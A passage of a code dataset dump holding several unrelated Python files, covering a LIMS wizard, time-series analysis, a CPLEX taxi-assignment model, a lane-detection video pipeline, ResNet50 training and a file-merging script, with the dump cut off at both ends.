('add',\n [t.id for t in self.start.typifications])]})\n return 'end'\n\n\nclass RemoveTypificationsStart(ModelView):\n __doc__ = 'Remove Typifications'\n __name__ = 'lims.scope_version.remove_typifications.start'\n typifications = fields.Many2Many('lims.typification.readonly', None,\n None, 'Typifications', required=True, domain=[\n (\n 'id', 'in', Eval('typifications_domain'))],\n depends=[\n 'typifications_domain'])\n typifications_domain = fields.One2Many('lims.typification.readonly', None, 'Typifications domain')\n\n\nclass RemoveTypifications(Wizard):\n __doc__ = 'Remove Typifications'\n __name__ = 'lims.scope_version.remove_typifications'\n start = StateView('lims.scope_version.remove_typifications.start', 'lims.scope_version_remove_typifications_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Remove', 'remove', 'tryton-ok', default=True)])\n remove = StateTransition()\n\n def default_start(self, fields):\n cursor = Transaction().connection.cursor()\n TechnicalScopeVersionLine = Pool().get('lims.technical.scope.version.line')\n cursor.execute('SELECT typification FROM \"' + TechnicalScopeVersionLine._table + '\" WHERE version = %s', (\n Transaction().context['active_id'],))\n t_ids = [x[0] for x in cursor.fetchall()]\n return {'typifications_domain': t_ids}\n\n def transition_remove(self):\n TechnicalScopeVersion = Pool().get('lims.technical.scope.version')\n scope_version = TechnicalScopeVersion(Transaction().context['active_id'])\n TechnicalScopeVersion.write([scope_version], {'version_lines': [\n ('remove',\n [t.id for t in self.start.typifications])]})\n return 'end'","sub_path":"pycfiles/kalenis_lims-5.0.0-py3.7/analysis.cpython-37.py","file_name":"analysis.cpython-37.py","file_ext":"py","file_size_in_byte":87850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"311564949","text":"from time_predict import read_data1\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pandas import Series,DataFrame\nfrom datetime import datetime\n\n\ndata_read=read_data1.ReadData()\n\ndata=data_read.read_data(1631,'13 12:00:00','13 15:00:00')\n\n\ndatels = [datetime.strptime(x, \"%Y-%m-%d %H:%M:%S\") for x in data['timedata']]\n\ndata['timedata']=datels\nindex=pd.DatetimeIndex(start=data['timedata'].min(),end=data['timedata'].max(),freq='T')\ndata1=DataFrame([None]*len(index),columns=['value'])\ndata1['timedata']=index\n\n\nmerge_data=data1.merge(data,left_on='timedata',right_on='timedata',how='left')\nmerge_data.loc[merge_data['value_y'].isna(),'value_y']=90\nprint(merge_data)\n\ntest_data=Series(merge_data['value_y'])\ntest_data.index=merge_data['timedata']\nplt.plot(test_data.values)\nplt.show()\nfrom statsmodels.tsa.stattools import adfuller\n\n\ndef test_stationarity(timeseries):\n # Determing rolling statistics\n rolmean = timeseries.rolling(12).mean()\n rolstd = timeseries.rolling(12).std()\n # Plot rolling statistics:\n orig = plt.plot(timeseries, color='blue', label='Original')\n mean = plt.plot(rolmean, color='red', label='Rolling Mean')\n std = plt.plot(rolstd, color='black', label='Rolling Std')\n plt.legend(loc='best')\n plt.title('Rolling Mean & Standard Deviation')\n plt.show(block=False)\n\n # Perform Dickey-Fuller test:\n print('Results of Dickey-Fuller Test:')\n dftest = adfuller(timeseries, autolag='AIC')\n dfoutput = pd.Series(dftest[0:4], index=['Test Statistic', 'p-value', '#Lags Used', 'Number of Observations Used'])\n for key, value in dftest[4].items():\n dfoutput['Critical Value (%s)' % key] = value\n print(dfoutput)\n\ntest_stationarity(test_data)\n\n\nexpwighted_avg = pd.DataFrame.ewm(test_data, halflife=12).mean()\nplt.plot(test_data)\nplt.plot(expwighted_avg, color='red')\nplt.show()\n\nfrom statsmodels.tsa.seasonal import seasonal_decompose\ndecomposition = seasonal_decompose(test_data)\n\ntrend = decomposition.trend\nseasonal = decomposition.seasonal\nresidual = decomposition.resid\n\nplt.subplot(411)\nplt.plot(test_data, label='Original')\nplt.legend(loc='best')\nplt.subplot(412)\nplt.plot(trend, label='Trend')\nplt.legend(loc='best')\nplt.subplot(413)\nplt.plot(seasonal,label='Seasonality')\nplt.legend(loc='best')\nplt.subplot(414)\nplt.plot(residual, label='Residuals')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.show()","sub_path":"time_predict/arma.py","file_name":"arma.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"414381443","text":"# -*- coding: utf-8 -*-\nimport cplex\nimport numpy as np\nimport pandas as pd\nfrom Instance import Instance\nTOLERANCE = 0.001\n\n\n\n# from Instance import Instance\n# import cplex\n\nEPS = 1e-6\ndef solve_instance_greedy(inst):\n available = [*range(inst.n)]\n assigned = []\n\n for pasx in range(inst.n):\n\n pas_dists = [*enumerate([inst.dist_matrix[i][pasx] for i in range(inst.n)])]\n filter_dists = [(i ,j) for i,j in pas_dists if i in available]\n match = min(filter_dists, key = lambda t: t[1])\n assigned.append(match)\n available.remove(match[0])\n \n tot_dist = sum([j for i,j in assigned])\n tuple_selected = [(j,i) for i,j in enumerate([j for j,i in assigned])]\n \n\n return [tot_dist, tuple_selected]\n################## Solucion FCFS greedy ######################\n\n\n###############################################################\n\n################## Solucion LP ################################\ndef generate_variables_pr(inst, myprob):\n n_vars_tot = inst.n**2\n obj = [0]*n_vars_tot\n lb = [0]*n_vars_tot\n names = []\n \n # var_cnt va a ser el valor que va llevando la cuenta de cuantas variables agregamos hasta el momento.\n var_cnt = 0\n # Generamos los indices.\n for i in range(inst.n):\n for j in range(inst.n):\n # Tenemos los dos for anidados porque necesitamos las combinaciones de (i,j), i = 1,...,m y j = 1,...,n.\n # Definimos el valor para (i,j). \n inst.var_idx[(i,j)] = var_cnt\n # Obtenemos el costo.\n obj[var_cnt] = inst.paxs_tot_fare[j]/(inst.dist_matrix[i][j] + inst.paxs_trip_dist[j] + .01)\n names.append('x_' + str(i) + str(j))\n # Incrementamos el proximo indice no usado..\n var_cnt += 1\n\n # Agregamos las variables al modelo.\n myprob.variables.add(obj = obj, lb = lb, names = names)\n \n \n \n# \t''' Genera la matriz de restricciones sobre myprob. Reemplazar pass por el codigo correspondiente.'''\n# \tpass\n\t\t\t\n\ndef generate_constraints_pr(inst, myprob):\n\t \n # Agregamos una a una las restricciones de demanda.\n # Nos movemos por los clientes (ya que es la restriccion de demanda).\n for j in range(inst.n):\n # Generamos los indices (que al final tambien va a tener m posiciones).\n ind = []\n taxi = []\n vals = [1]*inst.n\n # Agregamos en cada caso el indice de la variable que representa al arco (i,j), guardado en var_idx.\n for i in range(inst.n):\n ind.append(inst.var_idx[(i,j)])\n taxi.append(inst.var_idx[(j,i)])\n\n # Igual que en los casos anteriores, con los ind y vals generamos la representacion de la fila y la agregamos.\n # Notar que se hace dentro del \"for\", porque queremos agregar una restriccion por cada cliente.\n row = [ind,vals]\n row2 = [taxi, vals]\n myprob.linear_constraints.add(lin_expr = [row], senses = ['E'], rhs = [1])\n myprob.linear_constraints.add(lin_expr = [row2], senses = ['E'], rhs = [1])\n\t\n\ndef populate_by_row_pr(inst, myprob):\n generate_variables_pr(inst, myprob)\n generate_constraints_pr(inst, myprob)\n myprob.objective.set_sense(myprob.objective.sense.maximize)\n myprob.write('out/test_taxis_price.lp')\n\ndef solve_lp_pr(inst):\n\n # Resolvemos el LP.\n myprob = cplex.Cplex()\n populate_by_row_pr(inst,myprob)\n myprob.solve()\n\n # Obtenemos la info de la solucion.\n x = myprob.solution.get_values()\n f_obj = myprob.solution.get_objective_value()\n\n\n # get optimal i,j \n opt_i_j = np.reshape(np.array(myprob.solution.get_values()),(inst.n,inst.n))\n # get distances made\n d_made = sum(np.array(inst.dist_matrix) * opt_i_j)\n # get total dist\n total_dist = sum(d_made)\n \n return total_dist\n \n###############################################################\n\n#### Implementar funciones auxiliares necesarias para analizar resultados y proponer mejoras.\n\ndef main():\n results = []\n inst_types = ['small','medium','large','xl']\n n_inst = ['0','1','2','3','4','5','6','7','8','9']\n for t in inst_types:\n\n#Esquema para ejecutar las soluciones directamente sobre las 40 instancias.\n \n for n in n_inst:\n inst_file = 'input/' + t + '_' + n + '.csv'\n inst = Instance(inst_file)\n f_greedy, x_greedy= solve_instance_greedy(inst)\n f_lp = solve_lp_pr(inst)\n \n results.append([inst_file,f_greedy, f_lp])\n \n pd.DataFrame(results).to_csv('out/results_price_km.csv')\n \n \n\t\t\t \n\n# Modificar para ajustar el formato segun la conveninencia del grupo, agregando\n# o quitando informacion.\n \n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n\n\n\n\n","sub_path":"price_km.py","file_name":"price_km.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"434872776","text":"import cv2\nimport numpy as np\nfrom collections import deque\nimport pickle\nfrom moviepy.editor import *\nimport matplotlib.pyplot as plt\n\n# src_points = np.float32([[490, 482], [810, 482], [1250, 720], [40, 720]])\n# dest_points = np.float32([[0, 0], [1280, 0], [1250, 720], [40, 720]])\nsrc_points = np.float32([[545, 460], [735, 460], [1280, 700], [0, 700]])\ndest_points = np.float32([[0, 0], [1280, 0], [1280, 720], [0, 720]])\nundistort_mtx_dist = pickle.load(open(\"../pickle_saved/pickle_un_distortion.p\", \"rb\"))\nmtx = undistort_mtx_dist[\"mtx\"]\ndist = undistort_mtx_dist[\"dist\"]\n\n\nclass Line:\n def __init__(self):\n # was the line detected in the last iteration?\n self.detected = False\n # x values of the last n fits of the line\n # self.recent_xfitted = []\n self.recent_xfitted = deque(maxlen=10)\n # average x values of the fitted line over the last n iterations\n self.bestx = None\n # polynomial coefficients averaged over the last n iterations\n self.best_fit = None\n # polynomial coefficients for the most recent fit\n self.current_fit = [np.array([False])]\n # radius of curvature of the line in some units\n self.radius_of_curvature = None\n # distance in meters of vehicle center from the line\n self.line_base_pos = None\n # difference in fit coefficients between last and new fits\n self.diffs = np.array([0, 0, 0], dtype='float')\n # x values for detected line pixels\n self.allx = None\n # y values for detected line pixels\n self.ally = None\n # width of window while detecting pixels of line\n self.margin = 50\n # Minimum number of pixels found to recenter window\n self.minpix = 10\n # Number of windows to be searched for\n self.nwindows = 9\n\n def rad_of_curvature(self):\n ym_per_pix = 30. / 720 # meters per pixel in y dimension\n xm_per_pix = 3.7 / 900 # meteres per pixel in x dimension\n fit_curvature = np.polyfit(self.ally * ym_per_pix, self.allx * xm_per_pix, 2)\n curvature_radius = ((1 + (2 * fit_curvature[0] * np.max(self.allx) + fit_curvature[1]) ** 2) ** 1.5) \\\n / np.absolute(2 * fit_curvature[0])\n return curvature_radius\n\n def histogram_edges(self, binary_warped):\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n window_height = np.int(binary_warped.shape[0] / self.nwindows)\n histogram = np.sum(binary_warped[binary_warped.shape[0] // 2:, :], axis=0)\n midpoint = np.int(histogram.shape[0] / 2)\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n leftx_current = leftx_base\n rightx_current = rightx_base\n left_lane_inds = []\n right_lane_inds = []\n for window in range(self.nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_low = binary_warped.shape[0] - (window + 1) * window_height\n win_y_high = binary_warped.shape[0] - window * window_height\n win_xleft_low = leftx_current - self.margin\n win_xleft_high = leftx_current + self.margin\n win_xright_low = rightx_current - self.margin\n win_xright_high = rightx_current + self.margin\n # Identify the nonzero pixels in x and y within the window\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > self.minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > self.minpix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n if np.sum(left_lane_inds) != 0:\n self.detected = True\n else:\n self.detected = False\n return leftx, lefty, rightx, righty\n\n # def detect_edges_prev_values(self):\n\n\nleft_line = Line()\nright_line = Line()\n\n\ndef birds_eye_view(img):\n rows, cols, depth = img.shape\n\n M = cv2.getPerspectiveTransform(src_points, dest_points)\n warped = cv2.warpPerspective(img, M, (cols, rows), flags=cv2.INTER_LINEAR)\n\n return warped\n\n\ndef find_lines(binary_warped):\n leftx, lefty, rightx, righty = left_line.histogram_edges(binary_warped)\n\n # Fit a second order polynomial to each\n # Find new coefficients with average left and right fits\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n left_line.current_fit = left_fit\n right_line.current_fit = right_fit\n\n # Find left and right x intercepts with the coefficients\n ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n # Add the x intercepts to the last intercepts\n left_line.recent_xfitted.append(left_fitx)\n right_line.recent_xfitted.append(right_fitx)\n\n # Average the left and right fits\n left_fit_avg = np.mean(left_line.recent_xfitted, 0)\n right_fit_avg = np.mean(right_line.recent_xfitted, 0)\n\n # Set points of X and Y\n left_line.allx = left_fit_avg\n left_line.ally = ploty\n\n right_line.allx = right_fit_avg\n right_line.ally = ploty\n\n # Find new coefficients with the last n average iterations\n left_line.best_fit = np.polyfit(ploty, left_fit_avg, 2)\n right_line.best_fit = np.polyfit(ploty, right_fit_avg, 2)\n\n left_line.radius_of_curvature = left_line.rad_of_curvature()\n right_line.radius_of_curvature = right_line.rad_of_curvature()\n\n\ndef create_final_image(image, binary_warped, mean_radius, pos_of_car):\n # Create an image to draw the lines on\n warp_zero = np.zeros_like(binary_warped).astype(np.uint8)\n color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n left_fitx = left_line.best_fit[0] * ploty ** 2 + left_line.best_fit[1] * ploty + left_line.best_fit[2]\n right_fitx = right_line.best_fit[0] * ploty ** 2 + right_line.best_fit[1] * ploty + right_line.best_fit[2]\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n\n src = np.float32([[490, 482], [810, 482], [1250, 720], [40, 720]])\n dst = np.float32([[0, 0], [1280, 0], [1250, 720], [40, 720]])\n Minv = cv2.getPerspectiveTransform(dst, src)\n\n # Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(color_warp, Minv, (binary_warped.shape[1], binary_warped.shape[0]))\n result = cv2.addWeighted(image, 1, newwarp, 0.3, 0)\n cv2.putText(result, \"Mean Radius: \" + str(mean_radius), (400, 70), cv2.FONT_ITALIC, 1, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.putText(result, \"Car Position: \" + str(pos_of_car), (400, 100), cv2.FONT_ITALIC, 1, (255, 255, 255), 2, cv2.LINE_AA)\n return result\n\n\ndef abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):\n # Calculate directional gradient\n # Apply threshold\n # gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n if orient == 'x':\n sobel = cv2.Sobel(img, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n else:\n sobel = cv2.Sobel(img, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n abs_sobel = np.absolute(sobel)\n scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))\n sbinary = np.zeros_like(scaled_sobel)\n sbinary[(scaled_sobel >= thresh[0]) & (scaled_sobel <= thresh[1])] = 1\n return sbinary\n\n\ndef mag_thresh(image, sobel_kernel=3, mag_thresh=(0, 255)):\n # Calculate gradient magnitude\n # Apply threshold\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n\n abs_sobel = np.sqrt(sobelx ** 2 + sobely ** 2)\n scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))\n\n magbinary = np.zeros_like(scaled_sobel)\n magbinary[(scaled_sobel >= mag_thresh[0]) & (scaled_sobel <= mag_thresh[1])] = 1\n\n return magbinary\n\n\ndef dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi / 2)):\n # Calculate gradient direction\n # Apply threshold\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n\n abs_sobelx = np.absolute(sobelx)\n abs_sobely = np.absolute(sobely)\n\n direction = np.arctan2(abs_sobely, abs_sobelx)\n\n dirbinary = np.zeros_like(direction)\n dirbinary[(direction >= thresh[0]) & (direction <= thresh[1])] = 1\n\n return dirbinary\n\n\ndef gaussian_blur(img, kernel=5):\n # Function to smooth image\n blur = cv2.GaussianBlur(img,(kernel,kernel),0)\n return blur\n\n\ndef select_yellow(image_for_white):\n image_for_white = cv2.cvtColor(image_for_white, cv2.COLOR_RGB2BGR)\n lower = np.array([20, 60, 60])\n upper = np.array([38, 174, 250])\n mask = cv2.inRange(image_for_white, lower, upper)\n return mask\n\n\ndef select_white(image):\n lower = np.array([202, 202, 202])\n upper = np.array([255, 255, 255])\n mask = cv2.inRange(image, lower, upper)\n return mask\n\n\ndef comb_thresh(image):\n yellow = select_yellow(image)\n white = select_white(image)\n combined_binary = np.zeros_like(yellow)\n combined_binary[(yellow >= 1) | (white >= 1)] = 1\n return combined_binary\n\n\ndef generate_binary_image_old(image):\n ksize = 7\n hls = cv2.cvtColor(image, cv2.COLOR_RGB2HLS)\n s_channel = hls[:, :, 2]\n gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(30, 180))\n grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(30, 180))\n mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(80, 150))\n dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))\n combined = np.zeros_like(dir_binary)\n combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1\n # Threshold color channel\n s_thresh_min = 170\n s_thresh_max = 255\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1\n\n combined_binary = np.zeros_like(s_binary)\n combined_binary[(s_binary == 1) | (combined == 1)] = 1\n return combined_binary\n\n\ndef generate_binary_image(image):\n ksize = 7\n hls = cv2.cvtColor(image, cv2.COLOR_RGB2HLS)\n gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(30, 180))\n grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(30, 180))\n mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(80, 150))\n dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))\n combined = np.zeros_like(dir_binary)\n combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1\n # Threshold color channel\n # s_thresh_min = 170\n # s_thresh_max = 255\n # s_binary = np.zeros_like(s_channel)\n # s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1\n\n combined_binary = np.zeros_like(dir_binary)\n whiteyellowlines = comb_thresh(image)\n combined_binary[(whiteyellowlines == 1) | (combined == 1)] = 1\n return combined_binary\n\n\ndef color_sobel_combined(img):\n image_HLS = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n\n img_L = image_HLS[:, :, 1]\n img_abs_x = abs_sobel_thresh(img_L, 'x', 5, (50, 225))\n img_abs_y = abs_sobel_thresh(img_L, 'y', 5, (50, 225))\n wraped_L = np.copy(cv2.bitwise_or(img_abs_x, img_abs_y))\n\n img_S = image_HLS[:, :, 2]\n img_abs_x = abs_sobel_thresh(img_S, 'x', 5, (50, 255))\n img_abs_y = abs_sobel_thresh(img_S, 'y', 5, (50, 255))\n wraped_S = np.copy(cv2.bitwise_or(img_abs_x, img_abs_y))\n\n image_cmb = cv2.bitwise_or(wraped_L, wraped_S)\n image_cmb = gaussian_blur(image_cmb, 25)\n\n yellow_white_combined = comb_thresh(img)\n\n image_cmb_color = np.zeros_like(image_cmb)\n image_cmb_color[(yellow_white_combined >= .5) | (image_cmb >= .5)] = 1\n gaussian_blur(image_cmb_color)\n return yellow_white_combined, image_cmb, image_cmb_color\n\n\ndef pos_of_vehicle(binary_image):\n xm_per_pix = 3.7 / 378\n car_position = binary_image.shape[1] / 2\n lane_center_position = (left_line.allx[719] + right_line.allx[719]) / 2\n center_dist = (car_position - lane_center_position) * xm_per_pix\n return center_dist\n\n\ndef pipeline(image):\n rows, cols, depth = image.shape\n undistorted_image = cv2.undistort(image, mtx, dist, None, mtx)\n undistorted_image = gaussian_blur(undistorted_image, kernel=5)\n M = cv2.getPerspectiveTransform(src_points, dest_points)\n warped_image = cv2.warpPerspective(undistorted_image, M, (cols, rows), flags=cv2.INTER_LINEAR)\n a, b, binary_image = color_sobel_combined(warped_image)\n find_lines(binary_image)\n mean_radius = (left_line.radius_of_curvature + right_line.radius_of_curvature) / 2.\n pos_of_car = pos_of_vehicle(binary_image)\n result = create_final_image(undistorted_image, binary_image, mean_radius, pos_of_car)\n\n # f, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(1, 5, figsize=(24, 9))\n # f.tight_layout()\n # ax1.imshow(image)\n # ax1.set_title('Original Image', fontsize=30)\n # ax2.imshow(undistorted_image)\n # ax2.set_title('Undistorted Image', fontsize=30)\n # ax3.imshow(warped_image)\n # ax3.set_title('Warped Image', fontsize=30)\n # ax4.imshow(binary_image, cmap='gray')\n # ax4.set_title('Yellow White Binary Image', fontsize=15)\n # ax5.imshow(result, cmap='gray')\n # ax5.set_title('Result', fontsize=15)\n # plt.waitforbuttonpress()\n\n return result\n\n\n# import matplotlib.image as mpimg\n# im = mpimg.imread(\"../test_images/test5.jpg\")\n# pipeline(im)\n\n# import matplotlib.image as mpimg\n# import matplotlib.pyplot as plt\n# import glob\n# # test_image = mpimg.imread(\"../test_images/test5.jpg\")\n# images = glob.glob(\"../test_images/*.jpg\")\n# for image in images:\n# plt.imshow(pipeline(mpimg.imread(image)))\n# plt.waitforbuttonpress()\n# plt.close()\n\nvideo_output = '../output_videos/project_video_ouput.mp4'\nclip1 = VideoFileClip(\"../project_video.mp4\")\n\nwhite_clip = clip1.fl_image(pipeline)\nwhite_clip.write_videofile(video_output, audio=False)\n","sub_path":"lanefinding/lane_finding_video_pipeline.py","file_name":"lane_finding_video_pipeline.py","file_ext":"py","file_size_in_byte":15511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"155337853","text":"from os.path import join\n\nfrom keras.applications import ResNet50\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout\nfrom keras.models import Model, load_model\nfrom keras.utils.np_utils import to_categorical\n\nimport pandas as pd\nimport csv\nimport os\nimport numpy as np\nimport json\n\nfrom matplotlib import pyplot as plt\nimport sys\nsys.path.append(\"../../data_preparation/\")\n\nfrom batch_generator import BatchGenerator, BatchSequence\n\nfrom sklearn.metrics import recall_score, precision_score, f1_score\n\n\n#datadir = os.getcwd()\ninput_path = os.path.abspath('../../../mlipdata/')\n\ntrain={}\ntest={}\nvalidation={}\nwith open(os.path.join(input_path, 'train.json')) as json_data:\n train= json.load(json_data)\nwith open(os.path.join(input_path, 'test.json')) as json_data:\n test= json.load(json_data)\nwith open(os.path.join(input_path, 'validation.json')) as json_data:\n validation = json.load(json_data)\n\nprint('Train No. of images: %d'%(len(train['images'])))\nprint('Test No. of images: %d'%(len(test['images'])))\nprint('Validation No. of images: %d'%(len(validation['images'])))\n\n# JSON TO PANDAS DATAFRAME\n# train data\ntrain_img_url=train['images']\ntrain_img_url=pd.DataFrame(train_img_url)\ntrain_ann=train['annotations']\ntrain_ann=pd.DataFrame(train_ann)\ntrain=pd.merge(train_img_url, train_ann, on='imageId', how='inner')\n\n# test data\ntest=pd.DataFrame(test['images'])\n\n# Validation Data\nval_img_url=validation['images']\nval_img_url=pd.DataFrame(val_img_url)\nval_ann=validation['annotations']\nval_ann=pd.DataFrame(val_ann)\nvalidation=pd.merge(val_img_url, val_ann, on='imageId', how='inner')\n\ndatas = {'Train': train, 'Test': test, 'Validation': validation}\nfor data in datas.values():\n data['imageId'] = data['imageId'].astype(np.uint32)\n \n \nimages_path_train = os.path.abspath('../../../mlipdata/files/train/')\n\nfrom sklearn.preprocessing import MultiLabelBinarizer\nmlb = MultiLabelBinarizer()\n# loading labels\ny_train = np.array(train.labelId)\ny_validation = np.array(validation.labelId)\n\ny_train1000 = mlb.fit_transform(y_train)[:1000]\ny_validation500 = mlb.fit_transform(y_validation)[:500]\n\n# load the generator\ntraining_gen = BatchGenerator(input_dir=images_path_train, y=y_train1000, batch_size=64)\n\nbase_model = ResNet50(weights='imagenet', include_top=False, input_shape=(290,290,3))\n\n# Adding the last two fully-connected layers\nx = base_model.output\nx = GlobalAveragePooling2D()(x) # global average pooling (flatten)\nx = Dense(1024, activation='relu')(x) # should be rather large with 228 output labels\n#x = Dropout(0.5)(x)\ny = Dense(228, activation='softmax')(x) # sigmoid instead of softmax to have independent probabilities\n\nmodel = Model(inputs=base_model.input, outputs=y)\n# Train only the top layer\nfor layer in base_model.layers:\n layer.trainable = False\n \n# Use binary loss instead of categorical loss to penalize each output independently\nmodel.compile(optimizer='adam', loss='binary_crossentropy')\n\n# 1000 steps = 640000 random images per epoch\nmodel.fit_generator(training_gen, steps_per_epoch=100, epochs=10)\n\nmodel.save('./ResNet50.h5')","sub_path":"pretrained_network/Pretrained-networks/ResNet50/ResNet50.py","file_name":"ResNet50.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"585568921","text":"import csv\nimport json\nimport xml.etree.ElementTree as ET\n\n\ndef read_csv(file_name,array):\n try:\n with open(file_name) as csvfile:\n data = csv.DictReader(csvfile)\n for row in data:\n array.append(dict(row))\n except OSError:\n print (\"Cannot open:\", file_name)\n\n\ndef read_json(file_name,array):\n try:\n with open(file_name) as jsonfile:\n json_data = json.load(jsonfile)\n for dict in json_data.get('fields'):\n array.append(dict)\n except OSError:\n print (\"Cannot open:\", file_name)\n\n\ndef read_xml(file_name,array):\n try:\n open(file_name)\n xml_data = {}\n tree = ET.parse(file_name)\n root = tree.getroot()\n for child in root:\n for object in child:\n for value in object:\n xml_data[(object.get('name'))] = value.text\n array.append(xml_data)\n except OSError:\n print (\"Cannot open:\", file_name)\n\n\ndef filter(old_data, new_data, keys):\n for odict in old_data:\n filterDict = {key:value for (key,value) in odict.items() \n if key in keys}\n newDict = {key:(value if key.startswith('D') else int(value)) \n for (key,value) in filterDict.items()}\n new_data.append(newDict)\n\n\ndef save_table(table, keys, file_name):\n with open(file_name, 'w', newline='') as output_file:\n dict_writer = csv.DictWriter(output_file, keys, delimiter=\" \")\n dict_writer.writeheader()\n dict_writer.writerows(table)\n\n\ndef main():\n result_data = []\n # Getting files\n while True:\n print(\"Input file name:\")\n file_name = input()\n more_files = False\n\n if (file_name.endswith('csv')):\n read_csv(file_name,result_data)\n elif (file_name.endswith('json')):\n read_json(file_name,result_data)\n elif (file_name.endswith('xml')):\n read_xml(file_name,result_data)\n else:\n print(\"Chosen file format is not supported!\")\n\n proceed = False\n while (proceed == False):\n print(\"That's all? (yes/no)\")\n response = input()\n if (response == 'yes'):\n proceed = True\n more_files = False\n elif (response == 'no'):\n proceed = True\n more_files = True\n else:\n proceed = False\n\n if (more_files == False):\n break\n\n # Getting keys\n print(\"Input value n for D:\")\n Dn = int(input())\n keysD = []\n keysM = []\n for i in range(1, Dn+1):\n keysD.append(('D'+str(i)))\n\n print(\"Input value n for M:\")\n Mn = int(input())\n for i in range(1, Mn+1):\n keysM.append(('M'+str(i)))\n \n keys = keysD + keysM\n\n # Filtering data\n filtered_data = []\n filter(result_data, filtered_data, keys)\n\n # Sorting data\n filtered_data = sorted(filtered_data, key = lambda k: k['D1'])\n \n # Saving data\n save_table(filtered_data, keys, 'basic_results.tsv')\n print(\"Data succesfully saved in basic_results.csv\")\n\n # Advanced\n advanced_data = []\n advanced_data.append(filtered_data[0])\n\n for i in range(1, len(filtered_data)):\n current_dict = filtered_data[i]\n current_dict_Dval = [current_dict.get(key) for key in keys \n if key.startswith('D')]\n for k in range(0, len(advanced_data)):\n previous_dict = advanced_data[k]\n previous_dict_Dval = [previous_dict.get(key) for key in keys \n if key.startswith('D')]\n if (current_dict_Dval == previous_dict_Dval):\n previous_dict_keys = [previous_dict]\n for key in keysM:\n advanced_data[k][key] = (int(advanced_data[k].get(key) or 